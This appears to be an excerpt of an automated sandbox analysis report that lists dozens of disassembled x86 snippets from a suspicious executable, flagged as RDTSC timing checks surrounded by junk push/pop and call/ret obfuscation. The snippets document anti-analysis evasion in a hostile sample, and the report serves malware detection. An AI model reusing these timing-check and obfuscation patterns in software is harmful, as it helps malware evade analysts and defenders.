Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78200D second address: 782011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7821AA second address: 7821B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 780857 second address: 78085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7886AA second address: 7886AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787B7A second address: 787B9F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F28C47EE2C5h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787B9F second address: 787BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787D09 second address: 787D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787E6C second address: 787EBE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F28C4758076h 0x00000008 jmp 00007F28C4758084h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007F28C4758086h 0x00000017 js 00007F28C4758076h 0x0000001d pop eax 0x0000001e jg 00007F28C4758084h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007F28C475807Ch 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787EBE second address: 787ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F28C47EE2B6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78801E second address: 788036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758084h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B0B2 second address: 78B0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B52A second address: 78B530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B530 second address: 78B534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BB9F second address: 78BBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BBA3 second address: 78BBA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BC2E second address: 78BC4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F28C4758084h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BC4C second address: 78BC53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BC53 second address: 78BC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F28C4758078h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jmp 00007F28C4758089h 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C6DB second address: 78C6E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C6E0 second address: 78C6F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jo 00007F28C4758076h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C6F4 second address: 78C6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E317 second address: 78E31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E31B second address: 78E321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78DAC2 second address: 78DACC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E321 second address: 78E347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F28C47EE2B8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E347 second address: 78E3C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F28C4758078h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov di, D7C9h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F28C4758078h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 xor edi, dword ptr [ebp+122D186Eh] 0x0000004c mov dword ptr [ebp+122D339Dh], ecx 0x00000052 xchg eax, ebx 0x00000053 jc 00007F28C4758080h 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c je 00007F28C4758076h 0x00000062 popad 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 pushad 0x00000068 popad 0x00000069 push edi 0x0000006a pop edi 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E3C8 second address: 78E3CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 790545 second address: 790549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79100B second address: 791016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 791016 second address: 79102C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007F28C4758094h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F28C4758076h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7942DB second address: 7942EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7942EC second address: 7942F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7948A7 second address: 7948AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 795973 second address: 795979 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 795979 second address: 795A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F28C47EE2B8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F28C47EE2B8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 add bx, C784h 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007F28C47EE2B8h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 mov edi, 19B094FCh 0x00000068 sub dword ptr [ebp+124770D7h], ebx 0x0000006e xchg eax, esi 0x0000006f push eax 0x00000070 push edx 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 795A05 second address: 795A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 797908 second address: 797992 instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007F28C47EE2BFh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F28C47EE2B8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007F28C47EE2C1h 0x00000031 push 00000000h 0x00000033 and ebx, 0D27BD1Ah 0x00000039 mov dword ptr [ebp+122D2EAFh], edx 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F28C47EE2B8h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov dword ptr [ebp+12451D91h], eax 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 797992 second address: 797996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798966 second address: 79896A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7936DC second address: 7936E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7949EC second address: 7949FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79AA62 second address: 79AABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F28C4758078h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 sub ebx, dword ptr [ebp+122D29B2h] 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D2B4Bh], ebx 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 jmp 00007F28C4758086h 0x0000003c popad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79AABE second address: 79AAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79BA02 second address: 79BA29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F28C4758099h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F28C4758087h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79BA29 second address: 79BA2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 796AA2 second address: 796AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 796AA6 second address: 796AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79BB61 second address: 79BB6B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D8D2 second address: 79D8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79BB6B second address: 79BB71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D8D7 second address: 79D8DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D8DD second address: 79D8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79E91B second address: 79E925 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79E925 second address: 79E9A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jmp 00007F28C4758089h 0x00000010 pop ebx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F28C4758078h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D26DFh], eax 0x00000032 push eax 0x00000033 movsx ebx, si 0x00000036 pop ebx 0x00000037 push 00000000h 0x00000039 mov bx, si 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+124513BEh], ecx 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push edx 0x00000048 pop edx 0x00000049 pop edx 0x0000004a pop eax 0x0000004b push eax 0x0000004c pushad 0x0000004d jmp 00007F28C4758081h 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79DA64 second address: 79DA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79DA68 second address: 79DA6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79DA6C second address: 79DA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F28C47EE2C9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79CB01 second address: 79CB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79CB08 second address: 79CB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79F8EE second address: 79F8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A086B second address: 7A086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A086F second address: 7A0873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0873 second address: 7A0879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0879 second address: 7A0883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0883 second address: 7A08A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F28C47EE2C1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0A6E second address: 7A0A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A4AB0 second address: 7A4AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F28C47EE2C0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F28C47EE2C3h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 ja 00007F28C47EE2B6h 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A4AE4 second address: 7A4AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A50CC second address: 7A50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A50D0 second address: 7A50D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A50D4 second address: 7A515E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F28C47EE2BBh 0x0000000e call 00007F28C47EE2C5h 0x00000013 jmp 00007F28C47EE2C7h 0x00000018 pop ebx 0x00000019 pop ebx 0x0000001a push 00000000h 0x0000001c sub ebx, dword ptr [ebp+122D291Ah] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007F28C47EE2B8h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e movsx edi, ax 0x00000041 xchg eax, esi 0x00000042 jno 00007F28C47EE2BEh 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A515E second address: 7A5162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A5162 second address: 7A516C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A516C second address: 7A5172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AEFE3 second address: 7AEFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AEFE9 second address: 7AEFF3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF145 second address: 7AF16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 jmp 00007F28C47EE2C2h 0x00000017 pop ecx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF2E5 second address: 7AF2E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF416 second address: 7AF422 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2AA7 second address: 7B2AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2AB3 second address: 7B2AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F28C47EE2BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2AC0 second address: 7B2AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F28C4758078h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2AD3 second address: 7B2AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2BEF second address: 7B2C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758082h 0x00000009 popad 0x0000000a jns 00007F28C475807Ch 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jmp 00007F28C4758081h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2C2C second address: 7B2C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 743653 second address: 743665 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F28C475807Ah 0x0000000d rdtsc
